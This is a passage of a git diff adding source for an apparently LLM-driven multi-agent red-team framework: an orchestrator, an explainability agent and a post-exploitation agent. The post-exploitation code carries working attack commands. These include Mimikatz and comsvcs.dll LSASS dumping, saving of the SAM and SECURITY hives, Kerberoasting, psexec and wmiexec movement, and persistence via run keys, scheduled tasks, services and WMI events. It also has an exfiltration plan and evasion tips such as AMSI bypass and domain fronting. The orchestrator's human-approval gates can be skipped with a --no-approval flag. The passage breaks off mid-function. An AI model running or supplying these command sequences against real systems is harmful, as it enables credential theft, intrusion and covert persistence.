                risk_factors["detection_risk"] = "high"
                risk_factors["network_noise"] = "high"

        elif agent_type == "post_exploit":
            action = decision_data.get("action", "")
            if "dump" in action.lower() or "extract" in action.lower():
                risk_factors["detection_risk"] = "high"
                risk_factors["system_impact"] = "medium"
                risk_factors["evidence_trail"] = "significant"

        return risk_factors

    def _suggest_alternatives(self, agent_type: str, decision_data: Dict[str, Any]) -> List[str]:
        """Suggest alternative approaches (static per-agent-type lists)."""
        alternatives = []

        if agent_type == "recon":
            alternatives = [
                "Use passive reconnaissance techniques instead of active scanning",
                "Employ slower scan rates to reduce detection probability",
                "Utilize third-party intelligence sources for initial reconnaissance"
            ]
        elif agent_type == "c2":
            alternatives = [
                "Consider domain fronting techniques for additional stealth",
                "Implement multiple fallback C2 channels",
                "Use legitimate cloud services as C2 infrastructure"
            ]
        elif agent_type == "post_exploit":
            alternatives = [
                "Use living-off-the-land techniques instead of custom tools",
                "Implement time delays between actions to avoid pattern detection",
                "Utilize legitimate administrative tools for post-exploitation activities"
            ]

        return alternatives

    def _suggest_mitigations(self, agent_type: str, decision_data: Dict[str, Any]) -> List[str]:
        """
        Suggest risk mitigation strategies.

        NOTE(review): both parameters are currently ignored — the same static
        list is returned for every agent type and decision.
        """
        mitigations = [
            "Monitor network traffic for anomalous patterns",
            "Implement rate limiting to slow down automated attacks",
            "Deploy behavioral analysis tools to detect suspicious activities",
            "Maintain updated incident response procedures"
        ]

        return mitigations

    def _calculate_confidence(self, decision_data: Dict[str, Any]) -> float:
        """
        Calculate a confidence score in [0.0, 1.0] for the decision.

        Simple additive heuristic: each present field (target, action,
        parameters, context) contributes a fixed weight.
        """
        factors = []

        if decision_data.get("target"):
            factors.append(0.2)
        if decision_data.get("action"):
            factors.append(0.3)
        if decision_data.get("parameters"):
            factors.append(0.2)
        if decision_data.get("context"):
            factors.append(0.3)

        return min(sum(factors), 1.0)

    def format_explanation(self, explanation: Dict[str, Any], format_type: str = "json") -> str:
        """Format an explanation dict as "json", "yaml", or "markdown" (falls back to str())."""
        if format_type == "json":
            return json.dumps(explanation, indent=2)
        elif format_type == "yaml":
            return yaml.dump(explanation, default_flow_style=False)
        elif format_type == "markdown":
            return self._format_as_markdown(explanation)
        else:
            return str(explanation)

    def _format_as_markdown(self, explanation: Dict[str, Any]) -> str:
        """Render an explanation dict as a markdown report."""
        md = f"""
# Decision Explanation Report

**Agent Type**: {explanation.get('agent_type', 'Unknown')}
**Decision ID**: {explanation.get('decision_id', 'Unknown')}
**Timestamp**: {explanation.get('timestamp', 'Unknown')}
**Confidence Score**: {explanation.get('confidence_score', 0.0):.2f}

## Explanation
{explanation.get('explanation', 'No explanation available')}

## Risk Assessment
"""

        risks = explanation.get('risk_assessment', {})
        for risk, level in risks.items():
            md += f"- **{risk.replace('_', ' ').title()}**: {level}\n"

        if explanation.get('alternatives'):
            md += "\n## Alternative Approaches\n"
            for alt in explanation['alternatives']:
                md += f"- {alt}\n"

        if explanation.get('mitigations'):
            md += "\n## Suggested Mitigations\n"
            for mit in explanation['mitigations']:
                md += f"- {mit}\n"

        return md

# Example usage and testing
if __name__ == "__main__":
    # Initialize the explainability agent
    explainer = ExplainabilityAgent()

    # Example recon decision
    recon_decision = {
        "id": "recon_001",
        "action": "nmap_scan",
        "target": "192.168.1.1-100",
        "parameters": {
            "scan_type": "TCP SYN",
            "ports": "1-1000",
            "timing": "T3"
        },
        "context": "Initial network reconnaissance"
    }

    # Generate explanation
    explanation = explainer.explain_decision("recon", recon_decision)

    # Format and display in both supported presentation formats
    print("JSON Format:")
    print(explainer.format_explanation(explanation, "json"))

    print("\nMarkdown Format:")
    print(explainer.format_explanation(explanation, "markdown"))
diff --git a/src/agents/orchestrator.py b/src/agents/orchestrator.py
new file mode 100644
index 0000000000000000000000000000000000000000..0c67ccb6028c1723f939763fd643847b5da17004
--- /dev/null
+++ b/src/agents/orchestrator.py
@@ -0,0 +1,518 @@
"""
Cyber-LLM Agent Orchestrator

Main orchestration engine for coordinating multi-agent red team operations.
Manages workflow execution, safety checks, and human-in-the-loop approvals.

Author: Muzan Sano
Email: sanosensei36@gmail.com
"""

import json
import logging
import asyncio
import yaml
from typing import Dict, List, Any, Optional, Type
from dataclasses import dataclass
from datetime import datetime
from pathlib import Path

# Import agents
# NOTE(review): SafetyRequest and ExplainabilityRequest are imported but never
# referenced in this module — confirm they exist in their source modules.
# Type and Path above are also unused here.
from .recon_agent import ReconAgent, ReconRequest
from .c2_agent import C2Agent, C2Request
from .post_exploit_agent import PostExploitAgent, PostExploitRequest
from .safety_agent import SafetyAgent, SafetyRequest
from .explainability_agent import ExplainabilityAgent, ExplainabilityRequest

# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

@dataclass
class OperationContext:
    """Context for red team operation."""
    operation_id: str           # unique id (uuid4 in the CLI entry point)
    target: str                 # assessment target identifier
    objectives: List[str]       # high-level goals passed to agents
    constraints: Dict[str, Any] # mutable; recon findings are added here
    approval_required: bool = True
    stealth_mode: bool = True
    max_duration: int = 14400  # 4 hours

@dataclass
class AgentResult:
    """Result from agent execution."""
    agent_name: str
    success: bool
    data: Dict[str, Any]
    execution_time: float  # wall-clock seconds
    risk_score: float      # 0.0 (benign) .. 1.0 (maximum risk)
    # Annotation corrected: default is None, so the field is Optional.
    errors: Optional[List[str]] = None

class RedTeamOrchestrator:
    """
    Advanced orchestrator for coordinating multi-agent red team operations.
    Implements safety checks, human approval workflows, and operational security.
    """

    def __init__(self, config_path: Optional[str] = None):
        self.config = self._load_config(config_path)
        self.agents = self._initialize_agents()
        self.workflows = self._load_workflows()
        self.operation_history = []

    def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]:
        """Load orchestrator configuration from YAML, or built-in defaults."""
        if config_path:
            with open(config_path, 'r') as f:
                return yaml.safe_load(f)
        return {
            "max_parallel_agents": 3,
            "safety_threshold": 0.7,
            "require_human_approval": True,
            "log_all_operations": True,
            "auto_cleanup": True
        }

    def _initialize_agents(self) -> Dict[str, Any]:
        """Initialize all available agents, keyed by their workflow name."""
        return {
            "recon": ReconAgent(),
            "c2": C2Agent(),
            "post_exploit": PostExploitAgent(),
            "safety": SafetyAgent(),
            "explainability": ExplainabilityAgent()
        }

    def _load_workflows(self) -> Dict[str, Any]:
        """
        Load predefined workflow templates.

        Each workflow is an ordered list of phases; a phase names the agents
        it runs, whether they run in parallel, whether safety / human-approval
        gates apply, optional per-phase config_overrides, and optional
        depends_on (names of phases that must have succeeded first).
        """
        return {
            "standard_red_team": {
                "name": "Standard Red Team Assessment",
                "description": "Full red team engagement workflow",
                "phases": [
                    {
                        "name": "reconnaissance",
                        "agents": ["recon"],
                        "parallel": False,
                        "safety_check": True,
                        "human_approval": True
                    },
                    {
                        "name": "initial_access",
                        "agents": ["c2"],
                        "parallel": False,
                        "safety_check": True,
                        "human_approval": True,
                        "depends_on": ["reconnaissance"]
                    },
                    {
                        "name": "post_exploitation",
                        "agents": ["post_exploit"],
                        "parallel": False,
                        "safety_check": True,
                        "human_approval": True,
                        "depends_on": ["initial_access"]
                    }
                ]
            },
            "stealth_assessment": {
                "name": "Stealth Red Team Assessment",
                "description": "Low-detection red team workflow",
                "phases": [
                    {
                        "name": "passive_recon",
                        "agents": ["recon"],
                        "parallel": False,
                        "safety_check": True,
                        "human_approval": False,
                        "config_overrides": {"scan_type": "passive"}
                    },
                    {
                        "name": "targeted_exploitation",
                        "agents": ["c2", "post_exploit"],
                        "parallel": True,
                        "safety_check": True,
                        "human_approval": True,
                        "depends_on": ["passive_recon"]
                    }
                ]
            },
            "credential_focused": {
                "name": "Credential Harvesting Focus",
                "description": "Credential-focused assessment workflow",
                "phases": [
                    {
                        "name": "initial_recon",
                        "agents": ["recon"],
                        "parallel": False,
                        "safety_check": True,
                        "human_approval": False
                    },
                    {
                        "name": "credential_harvest",
                        "agents": ["post_exploit"],
                        "parallel": False,
                        "safety_check": True,
                        "human_approval": True,
                        "config_overrides": {"objectives": ["credential_harvest"]},
                        "depends_on": ["initial_recon"]
                    }
                ]
            }
        }

    async def safety_check(self, agent_name: str, planned_actions: Dict[str, Any]) -> Dict[str, Any]:
        """
        Perform safety and OPSEC compliance check.

        Delegates to the safety agent, then stamps the result with an
        "approved" flag based on the configured safety_threshold.

        # HUMAN_APPROVAL_REQUIRED: Safety checks require human oversight
        """
        logger.info(f"Performing safety check for {agent_name}")

        safety_agent = self.agents["safety"]
        safety_result = await safety_agent.evaluate_actions(planned_actions)

        # Check against safety threshold
        if safety_result["risk_score"] > self.config["safety_threshold"]:
            logger.warning(f"High risk detected for {agent_name}: {safety_result['risk_score']}")
            safety_result["approved"] = False
            safety_result["reason"] = "Risk score exceeds safety threshold"
        else:
            safety_result["approved"] = True

        return safety_result

    async def request_human_approval(self, agent_name: str, planned_actions: Dict[str, Any],
                                     safety_result: Dict[str, Any]) -> bool:
        """
        Request human approval for high-risk operations.
+ + # HUMAN_APPROVAL_REQUIRED: This function handles human approval workflow + """ + print(f"\n{'='*60}") + print(f"HUMAN APPROVAL REQUIRED - {agent_name.upper()}") + print(f"{'='*60}") + + print(f"Risk Score: {safety_result.get('risk_score', 'Unknown')}") + print(f"Risk Level: {safety_result.get('risk_level', 'Unknown')}") + + if safety_result.get('risks'): + print("\nIdentified Risks:") + for risk in safety_result['risks']: + print(f" - {risk}") + + if safety_result.get('mitigations'): + print("\nRecommended Mitigations:") + for mitigation in safety_result['mitigations']: + print(f" - {mitigation}") + + print(f"\nPlanned Actions Summary:") + print(json.dumps(planned_actions, indent=2)) + + print(f"\n{'='*60}") + + # In a real implementation, this would integrate with a proper approval system + while True: + response = input("Approve this operation? [y/N/details]: ").lower().strip() + + if response in ['y', 'yes']: + logger.info(f"Human approval granted for {agent_name}") + return True + elif response in ['n', 'no', '']: + logger.info(f"Human approval denied for {agent_name}") + return False + elif response == 'details': + print("\nDetailed Action Plan:") + print(json.dumps(planned_actions, indent=2)) + else: + print("Please enter 'y' for yes, 'n' for no, or 'details' for more information") + + async def execute_agent(self, agent_name: str, context: OperationContext, + config_overrides: Optional[Dict[str, Any]] = None) -> AgentResult: + """Execute a single agent with safety checks and approval workflow.""" + start_time = datetime.now() + + try: + agent = self.agents[agent_name] + + # Create agent-specific request + if agent_name == "recon": + request = ReconRequest( + target=context.target, + scan_type=config_overrides.get("scan_type", "stealth") if config_overrides else "stealth", + stealth_mode=context.stealth_mode + ) + planned_actions = { + "agent": agent_name, + "target": context.target, + "scan_type": request.scan_type + } + + elif agent_name == "c2": + 
request = C2Request( + payload_type="powershell", + target_environment="corporate", # Could be derived from recon + network_constraints=context.constraints.get("network", {}), + stealth_level="high" if context.stealth_mode else "medium" + ) + planned_actions = { + "agent": agent_name, + "payload_type": request.payload_type, + "stealth_level": request.stealth_level + } + + elif agent_name == "post_exploit": + request = PostExploitRequest( + target_system=context.target, + access_level="user", # Could be updated based on previous results + objectives=config_overrides.get("objectives", context.objectives) if config_overrides else context.objectives, + constraints=context.constraints, + stealth_mode=context.stealth_mode + ) + planned_actions = { + "agent": agent_name, + "target": context.target, + "objectives": request.objectives + } + + else: + raise ValueError(f"Unknown agent: {agent_name}") + + # Safety check + if context.approval_required: + safety_result = await self.safety_check(agent_name, planned_actions) + + if not safety_result["approved"]: + return AgentResult( + agent_name=agent_name, + success=False, + data={"error": "Failed safety check", "safety_result": safety_result}, + execution_time=0, + risk_score=safety_result.get("risk_score", 1.0), + errors=["Safety check failed"] + ) + + # Request human approval if required + if self.config["require_human_approval"]: + approved = await self.request_human_approval(agent_name, planned_actions, safety_result) + if not approved: + return AgentResult( + agent_name=agent_name, + success=False, + data={"error": "Human approval denied"}, + execution_time=0, + risk_score=safety_result.get("risk_score", 1.0), + errors=["Human approval denied"] + ) + + # Execute agent + logger.info(f"Executing {agent_name} agent") + + if agent_name == "recon": + result = agent.execute_reconnaissance(request) + elif agent_name == "c2": + result = agent.execute_c2_setup(request) + elif agent_name == "post_exploit": + result = 
agent.execute_post_exploitation(request) + + execution_time = (datetime.now() - start_time).total_seconds() + + # Extract risk score from result + risk_score = 0.0 + if hasattr(result, 'risk_assessment') and result.risk_assessment: + risk_score = result.risk_assessment.get('risk_score', 0.0) + + return AgentResult( + agent_name=agent_name, + success=True, + data=result.dict() if hasattr(result, 'dict') else result, + execution_time=execution_time, + risk_score=risk_score + ) + + except Exception as e: + execution_time = (datetime.now() - start_time).total_seconds() + logger.error(f"Error executing {agent_name}: {str(e)}") + + return AgentResult( + agent_name=agent_name, + success=False, + data={"error": str(e)}, + execution_time=execution_time, + risk_score=1.0, + errors=[str(e)] + ) + + async def execute_workflow(self, workflow_name: str, context: OperationContext) -> Dict[str, Any]: + """ + Execute a complete red team workflow. + + # HUMAN_APPROVAL_REQUIRED: Workflow execution requires oversight + """ + if workflow_name not in self.workflows: + raise ValueError(f"Unknown workflow: {workflow_name}") + + workflow = self.workflows[workflow_name] + logger.info(f"Starting workflow: {workflow['name']}") + + operation_start = datetime.now() + results = {} + phase_results = {} + + try: + for phase in workflow["phases"]: + phase_name = phase["name"] + logger.info(f"Executing phase: {phase_name}") + + # Check dependencies + if "depends_on" in phase: + for dependency in phase["depends_on"]: + if dependency not in phase_results or not phase_results[dependency]["success"]: + logger.error(f"Phase {phase_name} dependency {dependency} not satisfied") + phase_results[phase_name] = { + "success": False, + "error": f"Dependency {dependency} not satisfied" + } + continue + + # Execute agents in phase + if phase.get("parallel", False): + # Execute agents in parallel + tasks = [] + for agent_name in phase["agents"]: + config_overrides = phase.get("config_overrides") + task = 
self.execute_agent(agent_name, context, config_overrides) + tasks.append(task) + + agent_results = await asyncio.gather(*tasks) + else: + # Execute agents sequentially + agent_results = [] + for agent_name in phase["agents"]: + config_overrides = phase.get("config_overrides") + result = await self.execute_agent(agent_name, context, config_overrides) + agent_results.append(result) + + # Process phase results + phase_success = all(result.success for result in agent_results) + phase_results[phase_name] = { + "success": phase_success, + "agents": {result.agent_name: result for result in agent_results}, + "execution_time": sum(result.execution_time for result in agent_results), + "max_risk_score": max(result.risk_score for result in agent_results) if agent_results else 0.0 + } + + # Update context with results for next phase + for result in agent_results: + if result.success and result.agent_name == "recon": + # Update context with reconnaissance findings + if "nmap" in result.data: + context.constraints["discovered_services"] = result.data.get("nmap", []) + + logger.info(f"Phase {phase_name} completed: {'SUCCESS' if phase_success else 'FAILED'}") + + except Exception as e: + logger.error(f"Workflow execution failed: {str(e)}") + phase_results["error"] = str(e) + + # Generate final results + operation_time = (datetime.now() - operation_start).total_seconds() + overall_success = all(phase["success"] for phase in phase_results.values() if isinstance(phase, dict) and "success" in phase) + + results = { + "operation_id": context.operation_id, + "workflow": workflow_name, + "target": context.target, + "success": overall_success, + "execution_time": operation_time, + "phases": phase_results, + "timestamp": operation_start.isoformat(), + "context": { + "objectives": context.objectives, + "stealth_mode": context.stealth_mode, + "approval_required": context.approval_required + } + } + + # Store in operation history + self.operation_history.append(results) + + 
logger.info(f"Workflow {workflow_name} completed: {'SUCCESS' if overall_success else 'FAILED'}") + return results + + def generate_operation_report(self, operation_results: Dict[str, Any]) -> str: + """Generate comprehensive operation report.""" + explainability_agent = self.agents["explainability"] + return explainability_agent.generate_operation_report(operation_results) + + async def cleanup_operation(self, operation_id: str): + """Cleanup resources and artifacts from operation.""" + logger.info(f"Cleaning up operation: {operation_id}") + + # In a real implementation, this would: + # - Remove temporary files + # - Close network connections + # - Remove persistence mechanisms + # - Clear logs if required + + logger.info(f"Cleanup completed for operation: {operation_id}") + +def main(): + """CLI interface for Red Team Orchestrator.""" + import argparse + import uuid + + parser = argparse.ArgumentParser(description="Cyber-LLM Red Team Orchestrator") + parser.add_argument("--workflow", required=True, help="Workflow to execute") + parser.add_argument("--target", required=True, help="Target for assessment") + parser.add_argument("--objectives", nargs="+", default=["reconnaissance", "initial_access"], + help="Operation objectives") + parser.add_argument("--stealth", action="store_true", help="Enable stealth mode") + parser.add_argument("--no-approval", action="store_true", help="Skip human approval") + parser.add_argument("--config", help="Path to configuration file") + parser.add_argument("--output", help="Output file for results") + + args = parser.parse_args() + + async def run_operation(): + # Initialize orchestrator + orchestrator = RedTeamOrchestrator(config_path=args.config) + + # Create operation context + context = OperationContext( + operation_id=str(uuid.uuid4()), + target=args.target, + objectives=args.objectives, + constraints={}, + approval_required=not args.no_approval, + stealth_mode=args.stealth + ) + + # Execute workflow + results = await 
orchestrator.execute_workflow(args.workflow, context) + + # Generate report + report = orchestrator.generate_operation_report(results) + + # Output results + output_data = { + "results": results, + "report": report + } + + if args.output: + with open(args.output, 'w') as f: + json.dump(output_data, f, indent=2) + print(f"Operation results saved to {args.output}") + else: + print(json.dumps(output_data, indent=2)) + + # Cleanup + await orchestrator.cleanup_operation(context.operation_id) + + # Run the async operation + asyncio.run(run_operation()) + +if __name__ == "__main__": + main() diff --git a/src/agents/post_exploit_agent.py b/src/agents/post_exploit_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..9321f42dd0def0675b8c50c41724ce83f491e0fa --- /dev/null +++ b/src/agents/post_exploit_agent.py @@ -0,0 +1,506 @@ +""" +Cyber-LLM Post-Exploitation Agent + +Handles credential harvesting, lateral movement, and persistence operations. +Integrates with Mimikatz, BloodHound, and post-exploitation frameworks. + +Author: Muzan Sano +Email: sanosensei36@gmail.com +""" + +import json +import logging +import subprocess +from typing import Dict, List, Any, Optional +from dataclasses import dataclass +from pydantic import BaseModel +import yaml +from datetime import datetime + +# Configure logging +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger(__name__) + +class PostExploitRequest(BaseModel): + target_system: str + access_level: str # "user", "admin", "system" + objectives: List[str] + constraints: Dict[str, Any] + stealth_mode: bool = True + +class PostExploitResponse(BaseModel): + credential_harvest: Dict[str, Any] + lateral_movement: Dict[str, Any] + persistence: Dict[str, Any] + exfiltration: Dict[str, Any] + command_sequence: List[str] + risk_assessment: Dict[str, Any] + +class PostExploitAgent: + """ + Advanced post-exploitation agent for credential harvesting, + lateral movement, and persistence establishment. 
+ """ + + def __init__(self, config_path: Optional[str] = None): + self.config = self._load_config(config_path) + self.techniques = self._load_techniques() + self.persistence_methods = self._load_persistence_methods() + + def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: + """Load post-exploitation configuration.""" + if config_path: + with open(config_path, 'r') as f: + return yaml.safe_load(f) + return { + "max_execution_time": 3600, + "cleanup_on_exit": True, + "log_operations": True + } + + def _load_techniques(self) -> Dict[str, Any]: + """Load post-exploitation techniques database.""" + return { + "credential_harvest": { + "mimikatz": { + "technique": "T1003.001", + "commands": [ + "privilege::debug", + "sekurlsa::logonpasswords", + "sekurlsa::wdigest", + "sekurlsa::kerberos", + "sekurlsa::tspkg" + ], + "detection_risk": "high", + "requirements": ["admin_rights", "debug_privilege"] + }, + "lsass_dump": { + "technique": "T1003.001", + "commands": [ + "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump [PID] C:\\temp\\lsass.dmp full", + "reg save HKLM\\sam C:\\temp\\sam.hive", + "reg save HKLM\\security C:\\temp\\security.hive", + "reg save HKLM\\system C:\\temp\\system.hive" + ], + "detection_risk": "medium", + "requirements": ["admin_rights"] + }, + "kerberoasting": { + "technique": "T1558.003", + "commands": [ + "powershell -ep bypass", + "Import-Module .\\PowerView.ps1", + "Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat", + "Invoke-Kerberoast -OutputFormat HashCat" + ], + "detection_risk": "low", + "requirements": ["domain_user"] + } + }, + "lateral_movement": { + "psexec": { + "technique": "T1021.002", + "command_template": "psexec.exe \\\\{target} -u {domain}\\{user} -p {password} cmd.exe", + "detection_risk": "high", + "requirements": ["admin_creds", "smb_access"] + }, + "wmiexec": { + "technique": "T1047", + "command_template": "wmiexec.py {domain}/{user}:{password}@{target}", + "detection_risk": "medium", + 
"requirements": ["admin_creds", "wmi_access"] + }, + "rdp": { + "technique": "T1021.001", + "commands": [ + "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f", + "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes" + ], + "detection_risk": "medium", + "requirements": ["admin_rights"] + } + }, + "privilege_escalation": { + "uac_bypass": { + "technique": "T1548.002", + "methods": ["fodhelper", "computerdefaults", "sdclt"], + "detection_risk": "low" + }, + "token_impersonation": { + "technique": "T1134", + "commands": [ + "list tokens", + "impersonate_token {token}", + "getuid" + ], + "detection_risk": "medium" + } + } + } + + def _load_persistence_methods(self) -> Dict[str, Any]: + """Load persistence techniques.""" + return { + "registry_run_keys": { + "technique": "T1547.001", + "commands": [ + "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}", + "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}" + ], + "detection_risk": "medium", + "cleanup": "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /f" + }, + "scheduled_task": { + "technique": "T1053.005", + "commands": [ + "schtasks /create /tn {task_name} /tr {payload_path} /sc onlogon /ru system", + "schtasks /run /tn {task_name}" + ], + "detection_risk": "low", + "cleanup": "schtasks /delete /tn {task_name} /f" + }, + "service_creation": { + "technique": "T1543.003", + "commands": [ + "sc create {service_name} binpath= {payload_path} start= auto", + "sc start {service_name}" + ], + "detection_risk": "high", + "cleanup": "sc delete {service_name}" + }, + "wmi_event": { + "technique": "T1546.003", + "commands": [ + "powershell -c \"Register-WmiEvent -Query \\\"SELECT * FROM Win32_LogonSession\\\" -Action { Start-Process {payload_path} }\"" + ], + "detection_risk": "low", + "cleanup": 
"powershell -c \"Get-WmiEvent | Unregister-Event\"" + } + } + + def analyze_bloodhound_data(self, bloodhound_json: Optional[str] = None) -> Dict[str, Any]: + """ + Analyze BloodHound data for lateral movement opportunities. + + # HUMAN_APPROVAL_REQUIRED: Review lateral movement paths before execution + """ + # Simulated BloodHound analysis (in practice, would parse actual data) + analysis = { + "high_value_targets": [ + {"name": "DC01.domain.local", "type": "Domain Controller", "priority": 1}, + {"name": "SQL01.domain.local", "type": "Database Server", "priority": 2}, + {"name": "FILE01.domain.local", "type": "File Server", "priority": 3} + ], + "attack_paths": [ + { + "path": "Current User -> Domain Admins", + "steps": [ + "Kerberoast service accounts", + "Crack obtained hashes", + "Move to SQL01 with service account", + "Escalate via SQLi to SYSTEM", + "Extract cached domain admin credentials" + ], + "difficulty": "medium", + "detection_risk": "medium" + } + ], + "vulnerable_accounts": [ + {"name": "svc-sql", "type": "Service Account", "spn": True, "admin": False}, + {"name": "backup-svc", "type": "Service Account", "spn": True, "admin": True} + ], + "group_memberships": { + "domain_admins": ["administrator", "da-backup"], + "server_operators": ["svc-backup", "svc-sql"], + "account_operators": ["helpdesk1", "helpdesk2"] + } + } + + return analysis + + def plan_credential_harvest(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]: + """Plan credential harvesting operations based on access level.""" + harvest_plan = { + "primary_techniques": [], + "secondary_techniques": [], + "stealth_considerations": [], + "detection_risks": [] + } + + if access_level in ["admin", "system"]: + # High privilege techniques + if stealth_mode: + harvest_plan["primary_techniques"].extend([ + self.techniques["credential_harvest"]["lsass_dump"], + self.techniques["credential_harvest"]["kerberoasting"] + ]) + harvest_plan["stealth_considerations"].extend([ + "Use process 
hollowing to avoid direct Mimikatz execution", + "Implement AMSI bypass techniques", + "Use legitimate admin tools where possible" + ]) + else: + harvest_plan["primary_techniques"].append( + self.techniques["credential_harvest"]["mimikatz"] + ) + + else: + # User-level techniques + harvest_plan["primary_techniques"].append( + self.techniques["credential_harvest"]["kerberoasting"] + ) + harvest_plan["secondary_techniques"].extend([ + { + "technique": "Browser Credential Extraction", + "commands": ["powershell -c \"Get-ChromePasswords\""], + "detection_risk": "low" + }, + { + "technique": "WiFi Password Extraction", + "commands": ["netsh wlan show profiles", "netsh wlan show profile {profile} key=clear"], + "detection_risk": "very_low" + } + ]) + + return harvest_plan + + def plan_lateral_movement(self, bloodhound_analysis: Dict[str, Any], credentials: List[Dict[str, Any]]) -> Dict[str, Any]: + """Plan lateral movement strategy based on BloodHound analysis and available credentials.""" + + movement_plan = { + "target_systems": [], + "movement_techniques": [], + "escalation_path": [], + "operational_notes": [] + } + + # Prioritize targets + for target in bloodhound_analysis["high_value_targets"]: + movement_plan["target_systems"].append({ + "hostname": target["name"], + "priority": target["priority"], + "access_methods": ["wmiexec", "psexec", "rdp"], + "required_creds": "admin" + }) + + # Select movement techniques based on available credentials + if any(cred.get("admin", False) for cred in credentials): + movement_plan["movement_techniques"].extend([ + self.techniques["lateral_movement"]["wmiexec"], + self.techniques["lateral_movement"]["psexec"] + ]) + else: + movement_plan["movement_techniques"].append({ + "technique": "T1021.004", + "name": "SSH Lateral Movement", + "command_template": "ssh {user}@{target}", + "detection_risk": "low" + }) + + # Plan escalation path + for path in bloodhound_analysis["attack_paths"]: + movement_plan["escalation_path"].append({ + 
"path_name": path["path"], + "steps": path["steps"], + "estimated_time": "2-4 hours", + "required_tools": ["PowerView", "Invoke-Kerberoast", "Hashcat"] + }) + + return movement_plan + + def plan_persistence(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]: + """Plan persistence mechanisms based on access level and stealth requirements.""" + + persistence_plan = { + "primary_methods": [], + "backup_methods": [], + "cleanup_commands": [], + "monitoring_evasion": [] + } + + if access_level in ["admin", "system"]: + if stealth_mode: + # Stealthy high-privilege persistence + persistence_plan["primary_methods"].extend([ + self.persistence_methods["wmi_event"], + self.persistence_methods["scheduled_task"] + ]) + else: + # Standard high-privilege persistence + persistence_plan["primary_methods"].extend([ + self.persistence_methods["service_creation"], + self.persistence_methods["registry_run_keys"] + ]) + else: + # User-level persistence + persistence_plan["primary_methods"].append( + self.persistence_methods["registry_run_keys"] + ) + + # Add cleanup commands + for method in persistence_plan["primary_methods"]: + if "cleanup" in method: + persistence_plan["cleanup_commands"].append(method["cleanup"]) + + return persistence_plan + + def assess_detection_risk(self, operations: List[Dict[str, Any]]) -> Dict[str, Any]: + """Assess overall detection risk of planned operations.""" + + risk_levels = {"very_low": 1, "low": 2, "medium": 3, "high": 4, "very_high": 5} + total_risk = 0 + operation_count = 0 + + high_risk_operations = [] + + for operation in operations: + if "detection_risk" in operation: + risk_score = risk_levels.get(operation["detection_risk"], 3) + total_risk += risk_score + operation_count += 1 + + if risk_score >= 4: + high_risk_operations.append(operation.get("name", "Unknown Operation")) + + average_risk = total_risk / max(operation_count, 1) + + risk_assessment = { + "overall_risk_score": average_risk, + "risk_level": "HIGH" if average_risk >= 
def execute_post_exploitation(self, request: PostExploitRequest) -> PostExploitResponse:
    """
    Execute complete post-exploitation workflow.

    # HUMAN_APPROVAL_REQUIRED: Review post-exploitation plan before execution
    """
    logger.info(f"Starting post-exploitation on {request.target_system}")

    # Plan each phase in turn: BloodHound analysis, harvesting, movement,
    # persistence.
    bloodhound_analysis = self.analyze_bloodhound_data()
    credential_harvest = self.plan_credential_harvest(request.access_level, request.stealth_mode)

    # Simulated credentials (in practice these would come from the harvest).
    mock_credentials = [
        {"username": "svc-sql", "password": "Service123!", "domain": "domain.local", "admin": False},
        {"username": "backup-svc", "password": "Backup456!", "domain": "domain.local", "admin": True},
    ]

    lateral_movement = self.plan_lateral_movement(bloodhound_analysis, mock_credentials)
    persistence = self.plan_persistence(request.access_level, request.stealth_mode)

    # Flatten the phase plans into an ordered command sequence.
    command_sequence: list = []
    for tech in credential_harvest["primary_techniques"]:
        command_sequence.extend(tech.get("commands", []))
    for tech in lateral_movement["movement_techniques"]:
        if "command_template" in tech:
            command_sequence.append(f"# {tech.get('name', 'Lateral Movement')}")
            command_sequence.append(tech["command_template"])
    for method in persistence["primary_methods"]:
        command_sequence.extend(method.get("commands", []))

    # Aggregate every planned operation for the detection-risk estimate.
    all_operations = (credential_harvest["primary_techniques"]
                      + lateral_movement["movement_techniques"]
                      + persistence["primary_methods"])
    risk_assessment = self.assess_detection_risk(all_operations)

    # Static exfiltration plan (not derived from the target).
    exfiltration = {
        "methods": ["DNS tunneling", "HTTPS upload", "Email exfiltration"],
        "targets": [
            "C:\\Users\\*\\Documents\\*.doc*",
            "C:\\Users\\*\\Desktop\\*.pdf",
            "Registry hives",
            "Browser saved passwords",
        ],
        "staging_location": "C:\\Windows\\Temp\\update.log",
        "encryption": "AES-256",
        "compression": True,
    }

    response = PostExploitResponse(
        credential_harvest=credential_harvest,
        lateral_movement=lateral_movement,
        persistence=persistence,
        exfiltration=exfiltration,
        command_sequence=command_sequence,
        risk_assessment=risk_assessment,
    )

    logger.info(f"Post-exploitation plan complete for {request.target_system}")
    return response


def main():
    """CLI interface for PostExploitAgent."""
    import argparse

    parser = argparse.ArgumentParser(description="Cyber-LLM Post-Exploitation Agent")
    parser.add_argument("--target", required=True, help="Target system identifier")
    parser.add_argument("--access-level", choices=["user", "admin", "system"],
                        default="user", help="Current access level")
    parser.add_argument("--objectives", nargs="+", default=["credential_harvest", "lateral_movement"],
                        help="Post-exploitation objectives")
    parser.add_argument("--stealth", action="store_true", help="Enable stealth mode")
    parser.add_argument("--config", help="Path to configuration file")
    parser.add_argument("--output", help="Output file for results")
    args = parser.parse_args()

    agent = PostExploitAgent(config_path=args.config)
    request = PostExploitRequest(
        target_system=args.target,
        access_level=args.access_level,
        objectives=args.objectives,
        constraints={},
        stealth_mode=args.stealth,
    )
    response = agent.execute_post_exploitation(request)

    # Serialize the response phases into one JSON-friendly report.
    result = {
        "target": args.target,
        "credential_harvest": response.credential_harvest,
        "lateral_movement": response.lateral_movement,
        "persistence": response.persistence,
        "exfiltration": response.exfiltration,
        "command_sequence": response.command_sequence,
